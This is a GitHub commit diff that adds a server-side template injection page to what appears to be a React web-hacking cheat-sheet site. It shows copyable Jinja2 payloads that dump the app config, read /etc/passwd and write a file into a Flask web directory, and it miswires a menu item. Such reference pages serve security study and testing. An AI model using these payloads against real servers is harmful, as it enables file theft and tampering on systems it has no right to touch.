Skip to content

Commit 1cc4979

Browse files
rb-xrb-x
committed
adding read and write SSTI
1 parent aaa8c82 commit 1cc4979

File tree

2 files changed

+110
-2
lines changed

2 files changed

+110
-2
lines changed

src/components/LayoutApp.js

Lines changed: 14 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -16,7 +16,7 @@ import XSS from "./web/XSS";
1616
import SQLi from "./web/SqlInjection";
1717
import AboutUs from "./AboutUs";
1818
import FeedRSS from "./FeedRSS";
19-
19+
import SSTI from "./web/SSTI"
2020
const { Paragraph } = Typography;
2121
const { Sider, Content, Footer } = Layout;
2222
const IconFont = createFromIconfontCN({
@@ -186,12 +186,24 @@ export default (props) => {
186186
style={{ fontSize: "1.5em", marginTop: 3 }}
187187
/>
188188
}
189-
onClick={() => goTo(FeedRSS)}
189+
onClick={() => goTo(SSTI)}
190190
>
191191
Feed RSS
192192
</Menu.Item>
193193
<Menu.Item
194194
key='13'
195+
icon={
196+
<IconFont
197+
type='icon-rss'
198+
style={{ fontSize: "1.5em", marginTop: 3 }}
199+
/>
200+
}
201+
onClick={() => goTo(FeedRSS)}
202+
>
203+
Feed RSS
204+
</Menu.Item>
205+
<Menu.Item
206+
key='14'
195207
icon={
196208
<IconFont
197209
type='icon-about'

src/components/web/SSTI.js

Lines changed: 96 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,96 @@
1+
import React from "react";
2+
import { Typography, Divider } from "antd";
3+
import QueueAnim from "rc-queue-anim";
4+
const { Title, Paragraph } = Typography;
5+
6+
export default (props) => {
7+
8+
9+
10+
const python_jinja_dump = [{
11+
title: `{% for key, value in config.iteritems() %}
12+
<dt>{{ key|e }}</dt>
13+
<dd>{{ value|e }}</dd>
14+
{% endfor %}`
15+
}]
16+
;
17+
18+
const python_jinja_read = [
19+
{ title: `{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}` },
20+
{
21+
title: `{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}`
22+
},
23+
];
24+
const python_jinja_write = [
25+
{ title: `{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}` },
26+
];
27+
28+
const python_jinja_rce = [
29+
{
30+
title: ``
31+
}
32+
]
33+
return (
34+
<QueueAnim delay={300} duration={1500}>
35+
<Title
36+
variant='Title level={3}'
37+
style={{ fontWeight: "bold", margin: 15 }}
38+
>
39+
Template Injections (SSTI)
40+
</Title>
41+
<Paragraph style={{ margin: 15 }}>
42+
Template injection allows an attacker to include template code into an existant (or not) template.
43+
A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
44+
45+
46+
</Paragraph>
47+
48+
<Divider dashed />
49+
<Title style={{margin :15}} >
50+
Jinja2 ( Flask / Django )
51+
</Title>
52+
<div
53+
key='a'
54+
style={{
55+
padding: 15,
56+
}}
57+
>
58+
<Title level={3}>File reading</Title>
59+
<Paragraph>
60+
61+
</Paragraph>
62+
{python_jinja_read.map((k, i) => {
63+
return (
64+
<Paragraph key={i} copyable>
65+
{k.title}
66+
</Paragraph>
67+
);
68+
})}
69+
</div>
70+
<Divider dashed />
71+
<div
72+
key='b'
73+
style={{
74+
padding: 15,
75+
}}
76+
>
77+
<Title level={3}>Write into a file</Title>
78+
<Paragraph>
79+
80+
</Paragraph>
81+
{python_jinja_write.map((k, i) => {
82+
return (
83+
<Paragraph key={i} copyable>
84+
{k.title}
85+
</Paragraph>
86+
);
87+
})}
88+
</div>
89+
<Divider dashed />
90+
91+
92+
93+
94+
</QueueAnim>
95+
);
96+
};

0 commit comments

Comments
 (0)